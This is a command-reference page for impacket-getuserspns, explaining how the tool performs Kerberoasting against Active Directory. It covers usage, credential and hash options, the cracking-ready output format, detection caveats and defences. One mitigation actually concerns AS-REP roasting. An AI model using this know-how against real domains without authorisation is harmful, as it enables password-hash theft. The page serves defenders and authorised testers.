LinuxCommandLibrary

impacket-getuserspns

Request and retrieve Service Principal Names (SPNs)

TLDR

View documentation for the original command

$ tldr GetUserSPNs.py
copy

SYNOPSIS

impacket-getuserspns [[domain/]username[:password]@]target_ip_or_domain [options]

PARAMETERS

identity
    Specifies the authentication identity in the format: [[domain/]username[:password]@]. The target_ip_or_domain can be either an IP address or a domain name.

-h, --help
    Displays the help message and exits.

-debug
    Turns on debug output for more detailed information.

-v
    Enables verbose output.

-ts
    Adds a timestamp to every log message, useful for chronological analysis.

-target-ip IP
    Specifies the IP Address of the target machine. If omitted, the domain name provided in the identity will be used for resolution.

-port PORT
    Specifies the destination port to connect to. While the help states 'SMB', Kerberos primarily uses port 88.

-k
    Enables Kerberos authentication. Credentials will be obtained from a ccache file (specified by KRB5CCNAME environment variable), KDC_PROXY, or prompted if necessary. Requires -no-pass if no password is provided in identity.

-no-pass
    Do not prompt for a password. Particularly useful when using Kerberos authentication (-k) or NTLM hashes (-hashes).

-hashes LM:NT
    Provides NTLM hashes for authentication in the format LMhash:NThash. If the LM hash is not available, leave it blank (e.g., :NThash).

-aesKey hex key
    Specifies the AES key (128 or 256 bits, in hexadecimal format) to be used for Kerberos Authentication.

-dc-ip IP
    Specifies the IP Address of the Domain Controller. If omitted, the script will attempt to resolve the DC from the domain name provided.

-request-user USERNAME
    Requests a TGS ticket specifically for the specified USERNAME instead of attempting to retrieve SPNs for all users in the domain.

-outputfile FILE
    Writes the extracted hashes to the specified output FILE. If not specified, hashes are printed to standard output.

-no-format
    Disables formatting of the output, useful for scripting or piping to other tools that expect raw data.

DESCRIPTION

impacket-getuserspns is a specialized script within the Impacket toolkit designed to perform the Kerberoasting attack against Microsoft Active Directory. It leverages legitimate Kerberos functionality to request Ticket Granting Service (TGS) tickets for Service Principal Names (SPNs) that are associated with user accounts.

When a TGS ticket is successfully requested for an SPN, a portion of the ticket is encrypted with the NTLM hash of the service account's password. impacket-getuserspns extracts this encrypted hash, which can then be saved to a file (often in a format compatible with tools like Hashcat or John the Ripper) and subjected to offline password cracking.

This attack is highly effective because it allows an attacker, possessing even low-privileged domain credentials, to obtain potentially crackable password hashes without requiring direct interaction with the target service account's machine or elevated privileges on a Domain Controller. It exploits a common misconfiguration where service accounts are given weak or reused passwords.

CAVEATS

  • Requires valid domain credentials (even low-privileged) to perform the initial Kerberos TGS request.
  • Generates network traffic that can be detected by network monitoring solutions (e.g., IDS/IPS, SIEMs) looking for suspicious Kerberos activity.
  • Repeated attempts with incorrect credentials can lead to account lockouts, especially if targeting specific users with -request-user.
  • Only targets SPNs associated with user accounts, not computer accounts, as computer account passwords are typically long and random, making them uncrackable.
  • Offline cracking of the extracted hashes can be computationally intensive and time-consuming, depending on password complexity and available cracking resources.

KERBEROASTING ATTACK

Kerberoasting is an attack where an attacker attempts to extract Active Directory user password hashes from Kerberos service tickets (TGS-REP messages). It exploits the fact that any authenticated domain user can request a TGS ticket for any registered Service Principal Name (SPN). If an SPN is associated with a user account, the TGS ticket is encrypted with the NTLM hash of that user's password. The attacker can then take this encrypted portion offline and brute-force or dictionary-attack the hash to recover the plaintext password.

OUTPUT FORMAT

The hashes extracted by impacket-getuserspns are typically output in a format suitable for widely-used password cracking tools. For Hashcat, this often means a format similar to $krb5tgs$23$*user$service$domain$hash, where the various fields provide context for the cracking process.

MITIGATION STRATEGIES

To defend against Kerberoasting, organizations should:

  • Enforce strong, unique passwords for all service accounts, especially those associated with SPNs.
  • Regularly rotate service account passwords.
  • Monitor for anomalous Kerberos Ticket Granting Service (TGS) requests, particularly those from unusual sources or for a large number of SPNs.
  • Where possible, utilize Group Managed Service Accounts (gMSAs) or Managed Service Accounts (MSAs) for services. These account types have automatically managed, complex passwords that are difficult to compromise via Kerberoasting.
  • Ensure service accounts have the 'Do not require Kerberos preauthentication' setting disabled unless absolutely necessary for specific legacy services.

HISTORY

impacket-getuserspns is a component of the widely-used Impacket Python library, developed by SecureAuth Corporation. Impacket is a collection of tools and classes for programmatically working with network protocols. This specific script implements the Kerberoasting attack, a technique that gained significant attention and widespread adoption in offensive security, particularly after public presentations and tools by researchers like Harmj0y. Its development reflects the ongoing evolution of attack vectors against Active Directory, providing a robust and accessible method for extracting password hashes from service accounts.

SEE ALSO

impacket-getnpusers, hashcat, john, setspn(8)

Copied to clipboard